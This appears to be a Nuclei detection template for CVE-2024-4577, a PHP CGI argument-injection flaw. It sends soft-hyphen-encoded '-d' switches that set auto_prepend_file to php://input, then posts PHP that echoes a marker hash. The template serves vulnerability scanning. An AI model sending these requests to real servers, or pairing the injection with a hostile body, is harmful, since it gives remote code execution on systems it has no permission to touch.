id: CVE-2024-4577

info:
  name: PHP CGI - Argument Injection
  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
  severity: critical
  reference:
    - https://cloud.tencent.com/developer/article/2429455
  description: |
    PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
  impact: |
    Successful exploitation could lead to remote code execution on the affected system.
  remediation: |
    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
  metadata:
    verified: true
  tags: cve,cve2024,php,cgi,xampp,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"

    body: |
      <?php echo md5("CVE-2024-4577"); ?>

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
# digest: 4a0a00473045022005dbafb1a1e5880eb00b25c22a9b2dc8f59dae74615f07df7db16a600edf28b6022100801966bde7e3a212b5244584fa69c77c8d2721b6d9898c1e4f39c9a6ef6afab4:922c64590222798bb761d5b6d8e72950